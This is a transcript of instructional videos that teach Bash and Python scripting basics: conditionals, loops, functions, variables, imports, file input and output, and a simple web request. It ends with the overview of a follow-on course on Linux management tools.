[Video description begins] After echo, all the strings are put inside double quotation marks. [Video description
ends]
Now the next one is an arithmetic comparison. So I have if, then double parentheses surrounding the
comparison. So I've $1, so the first argument, less than $2, the second argument. The semi colon as usual, the
key word then, and we echo inside of the if block the literal string $1 less than $2. Then an else if is just E-L-I-
F, so elif. I have double parenthesis, $1 greater than $2, close the double parenthesis, semicolon then, and then
I echo the literal strings saying that $1 is greater than $2. And then I end the elif block with fi. Now we do a
string comparison. So if, with the double brackets again, $1 != $2.
[Video description begins] The square brackets are used in this line of code. [Video description ends]
And then I close the double brackets. So this is going to compare the strings $1 and $2, even if they're numbers
it will compare them as strings. Semi colon, the key word then, and then I echo the literal string $1 != $2.
So we read that as the first argument is not equal to the second argument, else. So a pure else block, so if the
condition fails, there's an else and then I just echo $1 and $2 are the same, and then I exit one. So this is a
failure condition. So if the two arguments are the same, the script will return a failure. And I close the block as
usual with fi. Then I echo an empty space at the end if it completes successfully.
[Video description begins] After the echo and empty space, there are two double quotation marks in the last
line of code. [Video description ends]
And then if it gets to the end without failing, it will return zero successfully. That's the default. So I'll exit the
code. Now let's run it. So we'll do ./conditionals with 1 and 2. So file.txt exists,1 is less than 2, and 1 is not
equal to 2. Now let's try it with 2 1. File.txt exists again, of course, that hasn't changed and 2 greater than 1 is
what gets printed, and 2 not equal to 1. Now let's try something else. Let's do it with, say words, bob steve.
So we don't get the arithmetic comparison or expansion, but we get bob is not equal to steve. Now if we get the
failure condition, let's say with 1 1, it tells me the file exists again, and then it says 1 and 1 are the same, and
then it quits out. Now we can use this by chaining commands together conditionally. So if we use the double
pipe and let's say echo "ok", so what this means if the first command fails the second one will be executed. So
we get file.txt exists, 1 and 1 are the same and we get ok.
[Video description begins] In the given and subsequent commands, the string ok is put inside double quotation
marks. [Video description ends]
But if we change this to 1 2, we don't get the ok. Because conditionals of 1 2 returns zero and it's successful, so
it doesn't execute the second command. Now I can change that and put a double ampersand that if the first
command succeeds, then it executes the second. So conditionals 1 2 will succeed.
So it will echo ok at the end, and it does. But if I change it to conditionals 1 1, It fails. So the echo doesn't get
processed. So you can think of the double pipe as execute the expression on the right if the left fails, and the
double ampersand execute the expression on the right if the left is successful. And that concludes this
demonstration of Bash conditionals.
During this video, you will learn how to use the for, while, and until loops in a Bash script.
Objectives
In this video, I'll demonstrate how to use the for, while, and until loops in a bash script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder in bash_loops, I do an ls, and we have a file error.log and looping. So looping is the
bash script that we're going to execute. So I'll open this up in nano, and we'll go through the code. So it starts
as always, with the bin/bash shebang. And then my first loop is looping over a numeric range.
So I echo the literal string 1 to 10, followed by a colon, and then I create a for loop. So I have the for keyword,
so for, the loop variable, i, in and in braces I have 1.. or dot dot 10. So this is the expansion of the numbers
from 1 to 10, so it will loop over the entire range. Followed by a semicolon then the keyword do. And inside
the loop, all I do is an echo with an empty space and the variable i.
[Video description begins] Before each variable, a dollar sign is placed. [Video description ends]
And then to close the loop block, we have the keyword done. We can also loop over command line arguments.
So the arguments that are passed to this script. So I echo arguments, the literal string, and then I have another
for loop, so for a in, and in double quotes I put $@. So this is the shortcut or the built in variable that accesses
all of the arguments that are passed followed by a semicolon and the keyword do.
And then inside this loop, I just echo the loop variable with an empty space before it. So, in the string, I have a
space and then $a, and then done, the keyword to close off the loop block. Now, let's have a look at a while
loop, now this one's a little bit more involved. So I'm going to continue looping while the error.log file is not
empty. So the expectation here is that we'll continue looping until somebody addresses this log file, has a look
at it and clears it.
So the while loop has the while keyword. Since this is an arithmetic comparison, I can use the double
parenthesis instead of the double square brackets like we would in an if statement. Then $, and then an open
parenthesis, and then the function we're going to use to check the file size. So this is the stat function, so the
stat command, --format "%S", which will return the size of the file error.log.
[Video description begins] The %s string is placed inside the double quotation marks. [Video description ends]
I close the parenthesis, and check to see if this is greater than 0. I close the double parenthesis followed by a
semicolon and the do keyword. Inside this loop, I do an echo saying, with the literal sting error.log is not
empty, clear to continue, dot dot dot and then I sleep for three seconds and check it again. And then like the for
loop, the while loop is closed off or terminated with the done keyword.
And now I have the until loop, so this loops until a particular condition is true. So while it's false, continue
looping. So while and until are very similar. So while continues while the condition is true, and until continues
while the condition is false. So in this case I have until, and then in double square brackets I have -d app.
So the -d is to check to see if a directory exists, -f checks to see if a file exists, and -e checks to see if it exists,
it can be either or. And then we close the double brackets, semicolon, the keyword do. So all loops have the
semicolon and then the do keyword. And then this case it says echo, Please create 'app' folder to proceed... And
then sleep for three seconds until it happens, and then done.
[Video description begins] The text app in the string is placed inside single quotation marks. [Video
description ends]
So now I'll this out, and exit, and now I'll do ./looping. So we didn't pass any arguments, but we got the
numbers from 1 to 10 and now error.log is not empty, clear to continue. So it's going to keep showing this
message every three seconds until we clear it. So I'll switch over to another terminal window I have opened in
the same folder in this bash_loops folder. I'm going to do a cat on error.log, which says an error has occurred,
so it has something in the file.
To clear it, I'm going to use the shortcut greater than symbol, so this is the redirection. So we're redirecting
nothing to error.log, so this is going to clobber the file and set it to 0. And now if I go back, so it exited the
while loop because we emptied the log file, and now it's saying, Please create 'app' folder to proceed. So we'll
do mkdir, so make directory app, and now I've created the folder, the loop exits and our program exits.
Now let's run this one more time, and I'm going to pass some arguments to it. I'm going to say the word one
steve ok hello. And if we look at the arguments loop, we get the results, one steve ok hello, and it successfully
loops over the arguments. Our while loop and until loops don't execute because the error log is empty. So it
doesn't enter that loop and the app folder has already been created. And that concludes this demonstration of
bash loops.
In this video, you will learn how to create custom functions in a Bash script.
Objectives
[Video description begins] Topic title: Bash Functions. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to create a custom function in a bash script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder in this bash functions folder, I have a script called function. So I'm going to use nano a
function and we'll have a look at the contents. So it begins with the regular bash shebang. And then we define
our function. So I have greet, followed by the open and close parenthesis. And then the function body is
enclosed in braces. So we have an open brace, the function body, and then the close brace after the function
completes.
So functions are treated a little bit differently in bash than they are in most other languages. We don't define
the function parameters on the function itself. We define it in the function. Arguments to a function are passed
as they are passed as arguments to a script. So we have dollar sign one for the first argument, dollar sign two
for the second.
And all the same built in variables we get when we're calling a script from the command line. So in this case,
dollar sign one is expected to have the greeting, and dollar sign two, expected to be the recipient. So the first
and second arguments. So we set greeting equal to dollar sign one, and recipient equal to dollar sign two. Then
I have an if statement. So I'm going to check to see if the greeting is empty. And if it's empty, I'm going to set
it to a default greeting of Hello.
[Video description begins] The square brackets are used in this line of code. [Video description ends]
So I have if [ [- z, and then "greeting", so dollar sign greeting, surrounded in double quotes. Then I'd close the
brackets, followed by a semi colon, the then keyword, and then I set greeting equals hello in the body of the if
statement, and then close the if statement with fi.
[Video description begins] The string Hello is placed inside the double quotation marks. [Video description
ends]
So hyphen z is a test to see if the variable is empty. Now as I demonstrated in the video bash conditionals, if
you have a command, then a double ampersand, and another command, if the command on the left is
successful, then the command on the right gets executed. Otherwise, it doesn't. So if we put [[ around- z and
then in "$recipient" followed by the double ampersand, then recipient equals world.
[Video description begins] The square brackets are used in this line of code. The string World is placed inside
the double quotation marks. [Video description ends]
What this is saying is that if recipient is empty, then we set recipient equal to world. Otherwise, we just
continue on as normal. And now one of the other strange things about bash functions is that we don't return the
results, we don't return a value from the function. We actually echo the result. So we do echo, and in double
quotes I have greeting.
So $greeting, $recipient!, and then I return 0. So the return is actually the status code or result code of the
function. Just as we would have an exit code from a script, we have a return code from a function, and it
behaves the same way. So now if I want to call a greeting and have it output the result, I just call greet.
So I just type the command greet, with no parenthesis or anything, just the basic word greet. If I want to
capture the output, I have a variable here, greeting underscore output, and I set that equal to dollar sign and
greet in parenthesis. So instead of the function echoing the result to the standard output, it will capture the
result and save it into a variable. We can also call it directly, so I have echo $. And then in parenthesis, I have
greet with the arguments Hi Steve.
So that should print the greeting Hi Steve. But it's echoing it from the captured result and not from within the
function itself. And then I have another variable called hello_jane, and I set that equal to $ (greet Hello Jane).
And then I echo "$hello_jane". So we capture the result in a variable, and then we echo the variable. So now
exit out of this in run./function. So we get hello world. So that was calling greet, so we get the default result.
Then we get Hi, Steve, and Hello, Jane. And that concludes this demonstration of bash functions.
[Video description begins] Topic title: Python Variables. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to assign basic values to variables in a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder in this Python variables folder, I have a script called variables.py. Let's open this using
Nano. So the goal here is to become familiar with some of the more important or the standard data types of
Python. So I begin having the usual Python 3 shebang, so #!/usr/bin/env python3. So this will execute it as
Python 3 when executed from our Bash shell.
So I start by creating a couple of strings, so we can create strings by surrounding text in single quotes or
double-quotes. So I start with greeting = 'Hello, World!', and this is all surrounded in single quotes. Then I
have a variable called another, and I set that equal to "Hello, Earth!", surrounded in double-quotes. So these
are two valid ways of creating strings using Python.
[Video description begins] The contents to be printed are placed inside the parentheses. [Video description
ends]
And then I print their contents. So I print the greeting, and I print the variable another. And then I do an empty
print to put an empty line between our first example here with strings and our next example. So now if we go
down, I create an integer. So, and the integer, you can think of as counting numbers.
So anything positive or negative but a whole number, so 0, 1, 2, 3, 4, or 5, like this, so I set quantity, a variable
called quantity = 5. We can also do floating point numbers or decimal numbers. So I have price, and I set that
equal to 9.99. So I'm going to multiply the quantity and the price, so let's print the quantity times the price.
[Video description begins] He highlights the following line of code: print('price * quantity:
{}' .format(quantity * price)). [Video description ends]
So I'll do a print. And in single quotes I have price * quantity, as in price times quantity, a colon, and then the
open and close brace together, which will get replaced in this formatted string. So one of the functions that we
can call on a string, so we can have our string and then .format, and it's going to replace the double brace with
quantity times price. And now, since price is a float and we're multiplying it by an integer, it will use a floating
point number to display the price times the quantity.
And after I go through the code, I'll execute the program and we can see the result. And then again, I put
another empty print to put an empty line. We also have the list type, a list type is exactly what you'd expect, it's
a list of things. So you can think of it as an array but, so I have this list called things and I set that equal to the
list. So we create a list using square brackets, so we surround our list in square brackets, and it's a list of
strings.
So I have the string car, so it's surrounded in single quotes, followed by a comma, then bicycle comma door
comma bird. So we have these four strings in a list called things. And then I can call print on things and I will
print the contents. We will print all the items, or we can select the single item by indexing it. So lists are
indexed from 0 onward. So the first item is the 0 item, so things[0] will give us car.
[Video description begins] He highlights the following line of code: print(things[0]). [Video description ends]
Things of 1, if we index it at 1, it would give us bicycle, 2 would be door, and 3 would be bird. In this case, I'm
doing print of things and at index at 0, so 0 in square brackets. And then I do an empty print to put some space
between this example and the next one. The next example is a tuple, or tuple as some people call it, I call it a
tuple. So I set the tuple equal to a list of items, but it's surrounded in parenthesis.
So I have an open parenthesis 42 comma, 16 comma, 84, and a closed parenthesis. Now, the big difference
here is a tuple, once it's created, cannot be modified, so we can't add elements to it or take elements away like
we can with the list. So it's a fixed size with fixed elements. So I'll print the tuple, and then I'll print the tuple
index at 2, so the 2 in square brackets, which should give us 84 because it's also indexed from 0.
[Video description begins] He highlights the following line of code: print(tuple[2]). [Video description ends]
And then I put an empty print. And now, we have a dictionary. So sometimes these are called associative
arrays in general. And I set person = to the open brace with the string name : Steve.
[Video description begins] The strings are placed inside the single quotation marks. [Video description ends]
So it's like a list, but we're indexing the list based on a name or a string instead of a number. So if I index it at
name, I get Steve, or if I index it at email, I get [email protected]. So I have email : [email protected],
and then I close the brace, so this creates a dictionary. So I print person, so I print the whole dictionary.
Then I print person index that name so the string name in square brackets, and then I print person index that
email, so email and square brackets. So let's see under the code, I'm going to close by Ctrl+X-ing out of it to
exit and do ./variables.py. And we get our results. So we get Hello, World printed, Hello Earth, the price times
the quantity is 49.95, so it's five times 9.99.
We print the list of items, so we get 'car', 'bicycle', 'door', 'bird' and then indexed at zero so we get 'car'. We
print the tuple or tuple, 42, 16 and 84 in parenthesis. And then we index it at 2 which gives us 84, and then our
dictionary, 'name' : 'Steve', email' : [email protected]. Then our dictionary index that name gives us Steve
an index that email gives us [email protected]. And that concludes this demonstration of basic Python
variables and the standard data types
[Video description begins] Topic title: Python Conditionals. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to use conditional segments in a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So, in my current folder, python conditionals, I do an ls, and we see that we have a file called conditionals.py
that I've created. So open this using nano, so nano of conditionals.py. And we'll go through this simple
example. So I'm demonstrating how to use conditional statements. So if statements. So I start out with the
usual python3 shebang.
And then the first line, I have an import of random, so I'm going to generate a random value a random number.
And I'm going to use that to determine what branch of an if statement I go into. So then I create the random
number, so I have the variable a to hold the random value equals random.randrange(5). So 5 means we want a
random integer from zero to four. So that's how the randrange returns.
[Video description begins] The number 5 is placed inside the parentheses. [Video description ends]
So the first if statement, so I have if a greater than zero, so we use the greater than symbol with a colon. So we
put a colon at the end of our clause, or clauses if there's more than one. And then this is a single line if
statement. So we have if colon, and then the statement that comes after the if, so if this is true, we print a is
greater than zero, so we print the literal string saying that a is greater than zero.
[Video description begins] The string is placed inside the double quotation marks. [Video description ends]
If a is equal to zero, so a double equal sign to test equality, if that's true, so we have a colon at the end of the
statement again, but then we have our print statement on the next line. Now the body of an if statement is
indented. So this indent is significant in Python. So anything indented under an if statement. Belongs to that
branch of code. So in this case if we get a equals zero, I say, I print, well that was unlucky.
Then I have elif, E-L-I-F which is short for else if, so if a is not equal to zero, I say elif a modulus two, which
is the percent sign, so a mod two. So if we divide a by two, and we take the remainder of that division, that
integer division if it's divisible by two, so that means if it's equal to zero, a mod two is equal to zero, so the
double equal sign zero colon. Then a is even. So we print a is even, else we print a is odd.
[Video description begins] There is a colon after else. [Video description ends]
So if a is not even, it's automatically odd. So that ends our if block. So you can have a straight if statement or if
elif or if elif else, so this is how conditional statements are done in Python. So now exit out of the code and run
./conditionals. So in this case, a is greater than zero and a is odd. Now we don't actually have a printed, we're
just seeing the results. And if I see, well that was unlucky. Well, we know a zero, if we say a is greater than
zero and a is even, well we know a is either two or four, so we can run it a few times and each time we run it,
we can get a different result.
But it's based on a random value. So each time we run it, we get a different value from that random generation.
Now if I run nano conditionals, I could actually put a print in, so I say print a, so we can see what a is each
time we run it. So it'll make it a little more obvious. So ./conditionals. So when a is two, a is actually greater
than zero, so that's correct. And as even I'll run it again for one a is still greater than zero, but this time a is odd.
So each time I run it, if I get a is zero it prints well that was unlucky. And that concludes this demonstration of
Python conditionals.
In this video, you will learn how to use the for and while loops in a Python script.
Objectives
[Video description begins] Topic title: Python Loops. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to use the for and while loops in a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder, I have a file called loops.py. I'll open it and we'll have a look at the contents. So again,
we have a Python script that starts with the usual Python 3 shebang. And then I set some values. So I create a
list called values and I set that equal to in square brackets the values 1, 33 and 66. So we have a list of integers.
Then for i in values, I print i. So the syntax for a for loop is for some loop variable in some values.
[Video description begins] This line of code ends with a colon. [Video description ends]
So in this for loop, we're just going to print the values so one at a time. So on each line, we'll print 1, 33, and
66. Now let's try a while loop. So I'm going to create two variables total = 0 and loop = 0. So we initialize
these both to 0. And this while loop is going to continue while total is less than 100.
[Video description begins] This line of code ends with a colon. [Video description ends]
[Video description begins] He highlights the following line of code: total += values[loop]. [Video description
ends]
Then on each iteration of the loop, so each time the loop repeats, it will increment loop so loop += 1. So loop
will start out as 0, 1, and then 2. Now, there's a bit of a danger here. If the values don't total up to at least 100,
then this loop will be an infinite loop and it will never stop. We can put in logical end so total less than 100 and
loop is less than or equal to 2. So if loop reaches three and we reach the end of the values, we'll also exit the
loop.
So this is a safer way of performing this function. So if we hit 100 before we reach the end of the values, we
exit the loop. Or if we reach the end of the loop and we haven't reached a total of 100 or more we also exit the
loop.
So there's no chance of getting into an infinite loop situation here. We can also do an infinite loop to begin
with, but break out of it on another condition. So I have while True so this loop will continue forever. So while
True then the colon, then indented I have the body of the loop. So I have val = input, then with this string Enter
a number.
[Video description begins] He highlights the following line of code: val = input(" Enter a number: "). [Video
description ends]
So this will stop for user input. And I'll be able to type a number in and then there'll be a try block. So this is
another concept here of exception handling. So if an error does occur, it performs what's in the except block.
And there's a very important statement here called break. So to exit a loop early, in this case, the only way to
exit this loop is to call break, to use the break keyword to exit out of the loop. So this statement will quit the
loop for us, because the loop condition will always be true.
[Video description begins] The try block starts with the following line of code: try:. [Video description ends]
[Video description begins] He highlights the following line of code: intval = int(val). [Video description ends]
So what's happening here is I'm converting what's I am typing what's been typed in, to an integer. And if this
fails, if anything other than an integer is entered, it will go to the except clause and break out.
[Video description begins] The except block starts with the following line of code: except:. [Video description
ends]
Otherwise, we'll print the intval, we'll just printed back. So now I'll exit out of this code. And what I'll do is run
./loops.py. So we get the first for loop that prints 1, 33 and 66. It sums up the total, although I don't print
anything in the first while loop. And then in the second while loop, I have to enter a number. So let's say 33, I
can enter 1 or 0 or -5. These are all valid integers. But if I enter something else like steve, it just breaks out of
the loop and the program ends. And that concludes this demonstration of Python loops.
[Video description begins] Topic title: Python Functions. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to create custom functions in a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder in python_functions, I have a file called functions.py, which contains our script. So I'll
do nano of functions.py. Let's have a look at the function I've created. So this file begins, as all Python scripts
do, with the usual shebang for python3. Then I have the keyword def. So def is to define a function, and that
function's called greet. And now in the parenthesis after our function name, we have the parameters.
So these are the arguments that the greet function accepts. We have the variable, greeting equals the double
single quotes, so this sets a default value. So if the variable is passed, then we set it to whatever value that
variable has. Otherwise, if no variable is passed, we set it to an empty string. And then I have a comma, and
recipient= double single quotes, again. So we have two default values that set it to empty strings.
And then after the function is defined, we close the parenthesis, and then we put the semicolon. Try that again.
And then we put a colon. And then indented under the def of the function, we have the function body.
Then the function ends when the indent goes back to the leftmost justification. So this greet of double open and
close parenthesis is where the function ends and the first line of code begins it. So let's have a look at the body
of the function.
[Video description begins] This line of code ends with a colon. [Video description ends]
So I have, if not greeting, so not is saying that if greeting is empty, inside of that I put greeting = 'Hello'.
[Video description begins] Hello is placed inside the single quotation marks. [Video description ends]
[Video description begins] This line of code ends with a colon. World is placed inside the single quotation
marks. [Video description ends]
So when we print the greeting, by default, greet will return Hello World and then we have a return function. So
in this case, we return a string, and it's an f string or a formatted string. So we use the Python3 syntax where
we have the f followed by a string in single quotes in this case. Then in braces, we have the variable, greeting.
So surrounded in braces we have greeting comma, a space that embraces recipient, followed by an exclamation
mark and we close the string. So in the main body of the code, I have greet. So I call it with the open and
closed parenthesis, so no arguments are passed to the function.
[Video description begins] He highlights the following line of code: print(greet()). [Video description ends]
And then I call print of greet. So the first call to greet won't actually do anything because the greet function is
returning a value but it's not printing anything. So this will go unnoticed. But if I call print on greet, it will
print the string returned by the function, greet. We can also save the result in a variable.
[Video description begins] He highlights the following line of code: result = greet('Hi', 'Jessica' ). [Video
description ends]
So I create a variable called result and I set that equal to greet. And then the arguments I pass are the string, Hi,
and the name, Jessica. So we have two strings passed, and then I print result. So let's exit out, and I'll run the
functions.py script. So ./functions.py. And we see Hello, World, and Hi, Jessica. And that concludes this
demonstration of Python functions.
In this video, you will learn how to import external modules in a Python script.
Objectives
[Video description begins] Topic title: Python Imports. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to import external modules in a Python script. So in this example, I'm going
to import modules from Python's standard library, specifically for date, time, and calendar.
[Video description begins] The screen displays a Terminal window. [Video description ends]
Which come up quite often in Python scripting. So I'm going to open using nano the imports.py in my current
folder. So it starts with the python3 shabang and then I import time, import calendar, import locale, and from
datetime, I import date, datetime. So the from import syntax, so we say from the datetime module, we want to
import the date and datetime objects from that module. So if there are objects within a module, we can import
them directly with this syntax.
So let's look at some ways we can access and use the date and time. So the first thing is to get the UNIX time.
So this is sometimes called the UNIX epoch. So, this is the seconds passed since midnight, UTC on January
1st, 1970. And the seconds is not just resolved to the nearest second, but there's also a long decimal fractional
second after it.
[Video description begins] He highlights the following line of code: print('Time since UNIX epoch:
{}'.format(time.time())). [Video description ends]
So I'll print the string, Time since UNIX epoch: and then the open and close brace where we're going to insert
the time. So I'll use .format on the string, and then time.time with parenthesis. So we're calling the time
function from the time module.
And then I print an empty space, so an empty print, so it'll have an empty line between this example and the
next one. The next one is to print an ISO-8601 formatted datetime. So we could do it with the local datetime
and with the UTC datetime.
[Video description begins] He highlights the following two lines of code: print('Local:
{}'.format(datetime.now()))print('UTC:{}'.format(datetime.utcnow())). [Video description ends]
So I print 'Local: {}'.format on the string with datetime.now. Now, one of the confusing things about the
datetime module in Python is that if we just did an import of datetime. So instead of from datetime we import
date and datetime. If I just did an import on datetime, I would actually have to call this function using
datetime.datetime.now.
[Video description begins] He enters the following line of code: datetime.datetime.now(). [Video description
ends]
Which gets a little bit confusing because there's the datetime module, but the datetime object within the
datetime module. So that's why I use the from syntax, so from datetime I import datetime. So I'll just delete
these two lines that I added for the example and continue on. So I print the string UTC: {} .format, and then
datetime.utcnow, which will give the UTC time rather than the local time. And then I print an empty line and
continue on with the next example.
So here I'm going to print only the date part. So only the year, month, and day in the ISO-8601 format, but just
with the date. So the first one will have the four digit year, hyphen, two digit month, hyphen, two digit day. So
it'll have the 01 for January month, or the date will also prepend the 0 for a number less than 10.
[Video description begins] He highlights the following line of code: current = date.today(). [Video description
ends]
I can also change the formatting of the date and time. So in this case, the next example I print Current date, but
the format, I call its method strftime. So string, so I think of this as string formatted time.
So I put a %A, then %B %d and %Y, an upper case Y. So this formatted time, the %A will give the day of the
week, the %B will give the full name of the month. %d, the day, the numeric day of the month, and %Y the
four digit year. And then we put an empty print statement. I can also print a text based calendar representing
the current month or whatever month I pass to it.
[Video description begins] He highlights the following line of code: print('Calendar:'). [Video description
ends]
I print calendar.month, so I call the month function of calendar and I pass current.year and current.month. So
it's going to print the calendar for the current year and month and then I put an empty print and then I print the
locale info.
So the locale info is important. If you're working in a different language, you'll get different names for the
months. And you'll get different date and time formats based on the locale. So if you are working in English, or
French, if you're in the US it's different than if you're in Spain or Italy or France or Denmark. Wherever you
are, the date and times will be in different formats. So now I'll exit out of the code and we'll run ./imports.
So I get the time since the UNIX epoch and it's this long number dot. So the number of seconds dot the
fractional part of the second. The local time is 2020-03-18, so March 18. At 23:41:46, so 23 hours, 41 minutes
and 46 seconds with a fractional part to the seconds. The UTC time is three hours ahead of this. So the UTC
time is actually on March 19. The current date is 2020-03-18. So we get the date part, or the current date is
Wednesday, March 18, 2020.
We get this nicely formatted calendar for March 2020. With the first beginning on a Sunday and the 31st on a
Tuesday, and all of the dates in the calendar weeks. And the locale for this system is en_CA. So it's English,
Canada, and the character encoding is UTF-8. And that concludes this demonstration of Python imports
through the Python standard library imports for date, time, and calendar modules.
[Video description begins] Topic title: Python File Operations. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to read and write files in a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder, I have a few files. So I have files.py, I have file.txt, and I have output.txt. So I'm going
to open up files. And this is going to interact with the files in the current folder. And we'll have a look and see
what we're going to do. So in this script, we begin with our usual shebang for Python 3. And then I have an
example.
[Video description begins] He highlights the following line of code: with open('output.txt', 'a') as f:. [Video
description ends]
So a few lines down after the comments I have with open, I pass the string output.txt. So it's going to open up
the output.txt file in the current folder, a. So the a specifier is for append. So it's not going to overwrite the file.
It's going to append to it. So there's different options as the second argument in the open function. We can pass
w for write, a for append, and r for read. We can also add a b to it. So if we had ab, it would expect the file to
be a binary file, but we're working with text files.
So in this case, we leave the b off, and I'm going to append to the current file. So I have with open output.txt, a
as f. So we need a file handle to operate on the file after it's open. And the width syntax with open, if this open
fails, it will exit out of this block and won't do anything with the file. So it's a way of checking if the file is
open successfully, then it executes the block of code, otherwise it continues on.
[Video description begins] He highlights the following line of code: f.write('Hello, World!\n') as f:. [Video
description ends]
So inside this block of code, I have f.write and I write the string Hello, World. Followed by a \n, because the
write doesn't automatically put the newline character in, so I put it in.
[Video description begins] He highlights the following line of code: f.close(). [Video description ends]
And then it's always good practice at the end of our with open block to call f.close to close the file. Now I'm
going to open a file for reading, and I'm going to read a text file line by line. So what I'm going to do is take
the line and prepend a line number to it and print it to the standard output. So I have line_ number, so the line
number variable starts out at 1. So I set it = 1, and then with open file.txt, r.
[Video description begins] He highlights the following line of code: with open('file.txt', 'r') as f:. [Video
description ends]
So we're opening this for reading and as f. So we're going to use the f variable as the file handle. Now to read it
line by line, I can use a for loop.
[Video description begins] This line of code ends with a colon. [Video description ends]
So for line in f, so for each line, I remove the newline character from line because it's going to read it with the
newline character. So we don't want an extra newline being printed when we call print.
[Video description begins] He highlights the following line of code: line = line.rstrip(). [Video description
ends]
So I'm going to strip that out of it. So on the right-hand side, it's going to strip out the newline character and
any other white space on the end of the line. So I set line = line.rstrip. So it strips out from the right-hand side
of the string, so the end of the string.
[Video description begins] He highlights the following line of code: print(f'{line_number}: {line}'). [Video
description ends]
And then I print the f string. So I have f followed by the string with line number in braces colon space, and
then the actual text for the line.
[Video description begins] He highlights the following line of code: line_number += 1. [Video description
ends]
[Video description begins] He highlights the following line of code: f.close(). [Video description ends]
And then when we exit the loop, we call f.close to close the file. Now I'll exit out and do a ./ of files.py. So the
contents of the file.txt was this passage of text. And it repeated the text, this little bit of Shakespeare, by
prepending line numbers to it in the print statement. So 1: Thou speak'st aright. And if I do a cat on the output,
we can see the contents of it. So in this case, there's been a few Hello, Worlds put in the file and then our
Hello, World on the new line.
And if I run the file again, so if I run ./files, it prints the same content from file.txt. And if I do cat of output
again, it put another Hello, World! at the end of that file. So it appended it. And the reason for these first three
Hello Worlds in the first line without a new line character, well, that was when I was a preparing the code. I
didn't put a new line in and it just put them on the same line and it just kept appending them.
So when I put the new line in, it started putting them on the new lines. And if I run it one more time and do a
cat of output.txt, we get one more. And that concludes this demonstration of Python file operations.
13. Video: Python Web Requests (it_cypgsodj_03_enus_13)
[Video description begins] Topic title: Python Web Requests . Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to make web URL requests from a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder, I have this web_request.py file, which I'll open with nano. So nano of web_request.py.
And this script starts out with the python3 shebang, and then an import of requests. So we use the requests
module to make a URL request to fetch a web page. And I import the re module for regular expression.
[Video description begins] He highlights the following line of code: url='http://example.com'. [Video
description ends]
So we're going to pull out the title from a webpage we're going to request. And the URL for the webpage is
going to be http://example.com.
[Video description begins] He highlights the following line of code: result = requests.get(url). [Video
description ends]
And then I call the request, so result = requests.get with the url as its argument.
[Video description begins] He highlights the following line of code: if result.status_code != 200:. [Video
description ends]
Now, requests also has a post function where we can post form information as well. But in this case, we're
going to keep it as a get request. So we're just going to fetch the contents without submitting any information.
Now, when a web request returns in the HTTP protocol, it gives us a status code. Now the status code for
success is 200 and we're expecting a 200. So if it's anything else, we're going to deem it a failure.
[Video description begins] He highlights the following line of code: raise ConnectionError('Status code:
{}'.format(result.status_code)). [Video description ends]
So if result.status code is not equal to 200, we're going to raise an exception. In this case it's called a
connection error exception. We'll print the status code that we do get from the connection error if there is one.
So it's always good practice when making web requests to check the status code to make sure you're getting the
status you expect.
And most often, it's 200. There can be success with other status codes like a 204. But in that case, 204 means
that the request was successful, but there is no content being returned. In this case we're expecting a webpage
to be returned.
[Video description begins] He highlights the following line of code: match = re.search('<title>(.*?)</title>' ,
str(result.content)). [Video description ends]
And the result is stored in the content property of result. So result.content as a result. So what I'm going to do
is look for the title tag. So I'll do a match = re.search. And then the string we have the title tag, so the title in
the angle brackets, and then we have our regular expression. So the pattern match with the (.*?) and then we
close the title tag so the open-angle /title and the close angle bracket. And then we pass the str of result.content
to make sure we're getting it in string form.
[Video description begins] He highlights the following line of code: title = match.group(1). [Video description
ends]
And then I call title = match.group(1). So group(1) in the match object contains what's in the match itself
between the tags. And then we print that title. So we're just extracting the title tag from this page. Now I'll go
to the command line and do ./web_request.py. So it made a request to example.com, it got the contents, and
printed example domain. Now, if we want to see the entire contents, we could do a print of str of result.content.
[Video description begins] He enters the following line of code: print(str(result.content)). [Video description
ends]
And we can see all the text of the HTML code. So I'm going to make that change and run it again. And in this
case, we get all of the data from the page. It's quite messy because it's not formatted. And if we scan it, we can
see there's a title tag and a close title tag, and inside we have example domain. And that's exactly what we
extracted, got what we expected. And that concludes this demonstration of a Python web request.
Objectives
So in this course, we've examined how to use some of the common statements and loops in both Bash and
Python scripts. We did this by exploring the elements in a scripting language as compared to a full-fledged
computer program. How to work with variables and conditional statements in Bash scripts. How to create
custom functions, and work with looping statements in Bash scripts.
Then how to work with variables, conditional statements, and looping statements in Python scripts. And how
to create custom functions and import external modules in Python scripts. How to perform file operations in
Python scripts. And how to make URL requests in Python scripts. In our next course, we'll move on to explore
how to work with some of the essential management and monitoring tools available in the Unix and Linux
environments.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview [Video description ends]
Hi I'm Steve Scott, I've been a software developer and IT consultant for almost a quarter of a century.
[Video description begins] Your host for this session is Steve Scott. He is an IT Consultant. [Video description
ends]
I've traveled around the globe to serve clients, responsible for building software architectures, hiring
development teams, and solving complex problems through code. With my toolbox of languages, platforms,
frameworks, and APIs, I round up my coding experience with a formal background in mathematics and
computer science. In this course, we're going to explore management and monitoring tools available in the
Unix and Linux environments, including working with user accounts and domain names, and monitoring user
and system activity. I'll start by examining how to securely connect to a remote server using SSH, and how to
work with user accounts in a Linux system.
And then I'll explore the elements of both an Internet Protocol routing table and a network interface. And show
how to perform Domain Name System lookups. Next, I'll examine the log files for monitoring critical events
on a Linux system and use the PS command to retrieve process information. And show how to retrieve disk
usage, partition information, and directory contents of a Linux system. I'll then demonstrate how to monitor
both user and system activity on a Linux system. Lastly, I'll demonstrate how to configure the time and date
